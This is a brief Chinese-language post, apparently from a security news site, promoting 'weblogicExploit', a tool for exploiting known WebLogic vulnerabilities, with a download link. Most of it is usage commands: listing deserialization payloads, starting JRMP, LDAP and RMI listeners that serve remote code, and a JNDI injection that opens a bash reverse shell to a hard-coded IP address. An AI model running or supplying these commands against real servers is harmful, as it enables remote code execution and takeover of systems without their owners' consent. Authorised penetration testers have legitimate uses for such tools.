weblogic历史漏洞利用工具 -- weblogicExploit
VSole2022-11-29 10:55:26
一、工具介绍
工具部分代码借鉴前辈的weblogic_cmd,属于二次再造轮子,部分功能暂未完善,后续将继续往上加功能。
二、安装与使用
1、列出可控payloads
java -jar weblogic.jar -payloads
2、启动JRMPListener
java -jar weblogic.jar -Jport 8888 -payload cc6 -c calc.exe
3、启动LDAP/RMI
LDAP java -jar weblogic.jar -jndistart -Jport 8888 -jndildap -codeurl http://127.0.0.1/#wlc618 RMI java -jar weblogic.jar -jndistart -Jport 8888 -jndirmi -codeurl http://127.0.0.1/
4、高版本jndi注入 ldap
java -jar weblogic\ tools.jar -jndistart -Jport 9922 -jndildap -highjdk -os linux -c 'open /System/Applications/Calculator.app' java -jar weblogic\ tools.jar -jndistart -Jport 9922 -jndildap -highjdk -os linux -c 'bash -i >& /dev/tcp/192.168.0.112/8888 0>&1'
三、下载地址:
https://github.com/8ypass/weblogicExploit

VSole
网络安全专家